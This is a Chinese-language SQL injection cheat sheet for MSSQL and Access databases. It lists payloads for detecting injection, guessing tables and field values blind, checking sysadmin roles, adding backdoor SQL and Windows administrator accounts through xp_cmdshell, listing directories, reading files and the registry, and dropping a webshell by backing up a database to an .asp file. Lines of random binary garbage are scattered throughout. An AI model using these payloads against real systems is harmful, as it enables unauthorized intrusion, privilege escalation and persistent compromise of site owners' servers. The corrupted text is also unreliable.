1.判断是否有注入;and 1=1 ;and 1=2 2s`~<�EF N
2.初步判断是否是mssql ;and user>0 tjD��CfJx*
w}(H�t_6q{
3.注入参数是字符'and [查询条件] and ''=' �}~NWOJ3�;
�
�{0} Q�5
4.搜索时没过滤参数的'and [查询条件] and '%25'=' R8u9tT�W��
� �B}h8c��
5.判断数据库系统 J#k.!]�r,Y
S\11�8TpD�
;and (select count(*) from sysobjects)>0 mssql rx�(z:��:�
q9�m-d-!)�
;and (select count(*) from msysobjects)>0 access ]�K>x:vMKH
�4
��eP-yi
u�*!/J R��
upF^k%<�y:
6.猜数据库 ;and (select Count(*) from [数据库名])>0 D�j{t[z]$k
A�|�0\�c�t
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Ha!]*�w�g#
��X;p4/ *U
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 8��:Jc2�K
�nc>Ae`"(�
9.(1)猜字段的ascii值(access) 6[C>"s}Ol
@{^6_n+gT%
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 E1rx��uV|9
.l]w4H�f��
(2)猜字段的ascii值(mssql) G2_�l}q��~
(L8z�<id<z
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 O�(44Dy@�2
JclG*/Wjg4
10.测试权限结构(mssql) �%-, -:e��
~]lV�ixr9�
8`�� f=E�h
P'C��D�V3+
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- .���Vb�\f�
�<<i���fd?
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- zE4TdT1y�|
vZ2/>}!Z�=
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 4>8'.�8S��
tv7A&Z)�Rh
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- i�N@+,]Yjl
J���l�N�<w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- T! fF1cpF\
�gJ��I(d6�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- !T8�h+3��I
9^1.nE(�R&
;and 1=(select IS_MEMBER('db_owner'));-- yB�xWBW*e
�nQ^��<h�.
[n;GP@A�]R
|R$/��o�q
11.添加mssql和系统的帐户 .UJjB�}4$f
��Wf�yap)y
;exec master.dbo.sp_addlogin username;-- 6):^m{RH^�
;exec master.dbo.sp_password null,username,password;-- q6
R���r?
x*�z$4)RP
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �92K#xM/��
�\A9hYTC)�
;exec master.dbo.xp_cmdshell 'net user username password ��aY�@st]p
�lip�1wR7
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ax+��P)�yz
h"+|�)'�*n
;exec master.dbo.xp_cmdshell 'net user username password /add';-- OQ�m-BL���
L�T�c=���D
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- h$y0>eMWs�
�s+y�X82Y
C'�j�E'B5b
Q�h.
:��
N
12.(1)遍历目录 a6fqtk�Z x
/6@Wm?�`DB
;create table dirs(paths varchar(100), id int) H-�a�SLc��
C~aN�Oe
WR
;insert dirs exec master.dbo.xp_dirtree 'c:\' }
h� pTS_
[>tyx{T Ye
;and (select top 1 paths from dirs)>0 D%��k]D�/�
�^l���"���
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �{:�r��8�X
c'r7sI�%Yi
��atO/T�p
!�@[@�xdV�
(2)遍历目录 v"dj%75O?e
�;\Vi�~2!8
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Oh��mi(s
�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 nXu�o���RZ
27�!9L�U�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��#=B~}
�_
w$�5#j�JX\
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 3d|n\!��1r
:.
ja~Q���
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 <MH|� <hP�
?�YO$NYwE�
�=8F]cW'1`
SX��x�2 ��
13.mssql中的存储过程 �qc-4;�m o
g���[~"�c}
xp_regenumvalues 注册表根键, 子键 a�D,(mw-7r
f}1R,N_f�C
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 +u:Q��+PkM
pK~K>8\��
xp_regread 根键,子键,键值名 |P"���p/iY
_,JdL�'[�d
;exec xp_regread ` E2�@GX+,
^S���ouA[
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 1Go�j�u�ey
y-iu�Ozq4
xp_regwrite 根键,子键, 值名, 值类型, 值 qs]7S^�yw�
���$`&u��u
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 C r~!�N|�(
,!RbFME&H�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �P�|�Ojt�I
,^UNQO*{GI
xp_regdeletevalue 根键,子键,值名 `/mcjKQ&9y
i�Y�JzSVO�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 do:3aP'S�,
W��s�;}D}+
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 J �c�~{ E
/Af:{|'$%�
q�!
����+?
mqg[2VT�RP
14.mssql的backup创建webshell [�o=v"s't)
^sNj[%I�
R
use model �9)a:8/��Y
/k�(KA [bS
create table cmd(str image); �uZ-y�u|1�
�6-�@
�X��
insert into cmd(str) values (''); Y!�6,�ty�'
9����Xg+$/
backup database model to disk='c:\l.asp'; m};�Q�ng]�
'o#ve72z1�
<XV\8Y+n��
d�+�Vx:`tT
15.mssql内置函数 �:{��d?B$�
$�Y�!$I�.+
;and (select @@version)>0 获得Windows的版本号 _�[,oP s:+
W7a ��aL�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �1{sf�Dw[s
��/�OpVr15
;and (select user_name())>0 爆当前系统的连接用户 zd+�_�
BPT
��;Mq��H)M
;and (select db_name())>0 得到当前连接的数据库 l�y�<1]�jK
Q_b�F^4�gt
,h�'��q}�5
�e)[>E\u�_
16.简洁的webshell j �z����aC
��V(%L}0[]
use model Z2]ySy�t]�
�`2X#;�{a:
create table cmd(str image); ���� l�qO"
{o?�+T�);Z
insert into cmd(str) values (''); HrUQ� X�4�
D|u! K��H�
backup database model to disk='g:\wwwtest\l.asp';
